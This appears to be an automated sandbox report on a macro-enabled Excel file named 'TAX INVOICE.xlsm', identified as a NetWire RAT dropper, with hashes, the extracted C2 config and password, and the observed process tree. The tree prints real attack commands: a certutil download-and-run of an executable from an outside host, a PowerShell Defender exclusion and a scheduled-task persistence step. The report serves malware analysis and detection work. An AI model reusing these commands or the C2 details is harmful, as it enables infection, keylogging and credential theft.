Overview

overview

10

Static

static

TAX INVOICE.xlsm

windows7-x64

10

TAX INVOICE.xlsm

windows10-2004-x64

10

Analysis

  • max time kernel
    101s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-20220718-en
  • resource tags

    arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
  • submitted
    10-08-2022 08:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TAX INVOICE.xlsm

  • Size

    42KB

  • MD5

    01b773033342534fdb00532c2fccbd96

  • SHA1

    d5842b04ae46d80240557b6238884df5b6243d3c

  • SHA256

    ac2eca59498f5324d3166d7ac8c3d3920fd3f4f7efc6bb4424a90d6fb5463d85

  • SHA512

    be43beeaa045d70aff287ab2ccd386ac2f869990793cdccb67956cbf8730ff6c83299904b0a2839d890e960804d111b1506b0d159c920009641d94661b295126

Score
10/10
netwirebotnetratstealer

Malware Config

Extracted

Family

netwire

C2

194.5.98.188:3364

194.5.98.188:3366
Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • keylogger_dir

    %AppData%\Logs\

  • lock_executable

    false

  • offline_keylogger

    true

  • password

    j5m52xuc

  • registry_autorun

    false

  • use_mutex

    false

Signatures

  • NetWire RAT payload 8 IoCs
    rat
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

    botnetstealernetwire
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\TAX INVOICE.xlsm"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c certutil.exe -urlcache -split -f "http://sayminame.com/new/process.exe" Vzuepamgtcvxotclhzm.exe.exe && Vzuepamgtcvxotclhzm.exe.exe
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1972
      • C:\Windows\SysWOW64\certutil.exe
        certutil.exe -urlcache -split -f "http://sayminame.com/new/process.exe" Vzuepamgtcvxotclhzm.exe.exe
        3⤵
          PID:888
        • C:\Users\Admin\Documents\Vzuepamgtcvxotclhzm.exe.exe
          Vzuepamgtcvxotclhzm.exe.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1072
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\GCwwHNZZQllj.exe"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1896
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GCwwHNZZQllj" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF577.tmp"
            4⤵
            • Creates scheduled task(s)
            PID:856
          • C:\Users\Admin\Documents\Vzuepamgtcvxotclhzm.exe.exe
            "C:\Users\Admin\Documents\Vzuepamgtcvxotclhzm.exe.exe"
            4⤵
            • Executes dropped EXE
            PID:1580

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\tmpF577.tmp
      Filesize

      1KB

      MD5

      5d668cfc01de8cf8e6211f0a78e0f304

      SHA1

      d1865c4e4d8248bf57b38d37c65c0fc25eed1aa8

      SHA256

      6f9d49ccc4ef910ebd5bc8eab5a965bae3cd66d5841608da3eaf5e0e8bf6ee31

      SHA512

      1db3b234cdd1d49872bc5a0c287ac73513b4277ca3b4779e5de8246695c9a0299397620a6719b277ac1776a7ce85c1f10be728bf4568e5cc695373ac8683bb86

      Download Submit

    • C:\Users\Admin\Documents\Vzuepamgtcvxotclhzm.exe.exe
      Filesize

      877KB

      MD5

      b9f12014018438f46d4a7e668919b370

      SHA1

      5265ef447a377aeb380bfaa16835f9e8d1ed162a

      SHA256

      7d8baae21bcb552ebcd990c0f242ad47aea319b8f3b88b6f50b3d11e65b00e6d

      SHA512

      35e024cf309ecf8190ae4b0fc8309e04554aec5fceb7d368db85b9cc5d9a089e2f566068b2de79107002fa1a72e8d68259805c55a30b4823983512b7807126d7

      Download Submit

    • C:\Users\Admin\Documents\Vzuepamgtcvxotclhzm.exe.exe
      Filesize

      877KB

      MD5

      b9f12014018438f46d4a7e668919b370

      SHA1

      5265ef447a377aeb380bfaa16835f9e8d1ed162a

      SHA256

      7d8baae21bcb552ebcd990c0f242ad47aea319b8f3b88b6f50b3d11e65b00e6d

      SHA512

      35e024cf309ecf8190ae4b0fc8309e04554aec5fceb7d368db85b9cc5d9a089e2f566068b2de79107002fa1a72e8d68259805c55a30b4823983512b7807126d7

      Download Submit

    • C:\Users\Admin\Documents\Vzuepamgtcvxotclhzm.exe.exe
      Filesize

      877KB

      MD5

      b9f12014018438f46d4a7e668919b370

      SHA1

      5265ef447a377aeb380bfaa16835f9e8d1ed162a

      SHA256

      7d8baae21bcb552ebcd990c0f242ad47aea319b8f3b88b6f50b3d11e65b00e6d

      SHA512

      35e024cf309ecf8190ae4b0fc8309e04554aec5fceb7d368db85b9cc5d9a089e2f566068b2de79107002fa1a72e8d68259805c55a30b4823983512b7807126d7

      Download Submit

    • \Users\Admin\Documents\Vzuepamgtcvxotclhzm.exe.exe
      Filesize

      877KB

      MD5

      b9f12014018438f46d4a7e668919b370

      SHA1

      5265ef447a377aeb380bfaa16835f9e8d1ed162a

      SHA256

      7d8baae21bcb552ebcd990c0f242ad47aea319b8f3b88b6f50b3d11e65b00e6d

      SHA512

      35e024cf309ecf8190ae4b0fc8309e04554aec5fceb7d368db85b9cc5d9a089e2f566068b2de79107002fa1a72e8d68259805c55a30b4823983512b7807126d7

      Download Submit

    • memory/856-75-0x0000000000000000-mapping.dmp

      Download

    • memory/888-62-0x0000000000000000-mapping.dmp

      Download

    • memory/1072-73-0x0000000005EF0000-0x0000000005F68000-memory.dmp

      Filesize

      480KB

      Download

    • memory/1072-72-0x0000000000490000-0x000000000049C000-memory.dmp

      Filesize

      48KB

      Download

    • memory/1072-70-0x0000000000450000-0x0000000000474000-memory.dmp

      Filesize

      144KB

      Download

    • memory/1072-68-0x0000000000C50000-0x0000000000D32000-memory.dmp

      Filesize

      904KB

      Download

    • memory/1072-66-0x0000000000000000-mapping.dmp

      Download

    • memory/1072-78-0x0000000005130000-0x0000000005168000-memory.dmp

      Filesize

      224KB

      Download

    • memory/1580-89-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1580-94-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1580-96-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1580-90-0x000000000040242D-mapping.dmp

      Download

    • memory/1580-84-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1580-86-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1580-88-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1580-82-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1580-85-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1580-79-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1580-80-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1660-60-0x0000000000559000-0x000000000055D000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1660-98-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1660-58-0x0000000075481000-0x0000000075483000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1660-54-0x000000002FD01000-0x000000002FD04000-memory.dmp

      Filesize

      12KB

      Download

    • memory/1660-55-0x00000000714F1000-0x00000000714F3000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1660-59-0x0000000000559000-0x000000000055D000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1660-57-0x00000000724DD000-0x00000000724E8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1660-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1660-71-0x00000000724DD000-0x00000000724E8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1660-99-0x00000000724DD000-0x00000000724E8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1896-74-0x0000000000000000-mapping.dmp

      Download

    • memory/1896-97-0x0000000066760000-0x0000000066D0B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1896-95-0x0000000066760000-0x0000000066D0B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1972-61-0x0000000000000000-mapping.dmp

      Download